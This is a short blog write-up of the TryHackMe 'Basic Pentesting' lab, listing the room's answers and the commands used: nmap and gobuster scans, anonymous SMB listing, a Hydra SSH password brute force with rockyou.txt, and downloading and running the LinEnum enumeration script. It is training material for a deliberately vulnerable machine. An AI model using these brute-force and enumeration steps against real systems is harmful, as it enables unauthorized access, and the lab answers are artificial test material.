Challenges: Basic Pentesting (TryHackMe)

JebitokJebitok
2 min read

Table of contents

This article will cover the Basic Pentesting write-up on THM Challenges.

Web App Testing and Privilege Escalation

In these set of tasks you'll learn the following:

  • brute forcing

  • hash cracking

  • service enumeration

  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

Answer the questions below

  1. Deploy the machine and connect to our network

  2. Find the services exposed by the machine

  3. What is the name of the hidden directory on the web server(enter name without /)? development

nmap -sV -p 1-65000 <IP_Address>

gobuster dir -u <IP_Address> -w /usr/share/wordlists/dirb/common.txt

  1. User brute-forcing to find the username & password

  2. What is the username? jan
    smbclient -L \\\\<IP_Address>\\ -N

    smbclient -L \\\\10.10.11.217\\Anonymous -N this launches the smb client

    smb: \> ls
    // we’ll access the staff.txt file

    smb: \> exit

    cat staff.txt //We’ll find two users

  3. What is the password? armando

    There are a lot of Hydra commands, but the one that worked for this case was the one that uses SSH

    hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.143.82

  4. What service do you use to access the server(answer in abbreviation in all caps)? SSH

  5. Enumerate the machine to find any vectors for privilege escalation

    On one tab, start the server at port 8000: python3 -m http.server 8000

    on another run the following commands:

    wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh

    wget http://10.10.144.83:8000/LinEnum.sh

    chmod +x LinEnum.sh

    ./LinEnum.sh

  6. What is the name of the other user you found(all lowercase)? kay

  7. If you have found another user, what can you do with this information?

    For this last part, you’ll be using John and SSH2John.py to find the id_rsa and later on the password

  8. What is the final password you obtain? heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Thank you for reading my article. Please leave any questions or comments on improving my learning journey and the THM challenges.

0
Subscribe to my newsletter

Read articles from Jebitok directly inside your inbox. Subscribe to the newsletter, and don't miss out.

pentestingtryhackmeWrite UpHydranmapgobusterjohn-the-ripper

Written by

Jebitok
Jebitok

Software Developer | Learning Cybersecurity | Open for roles * If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.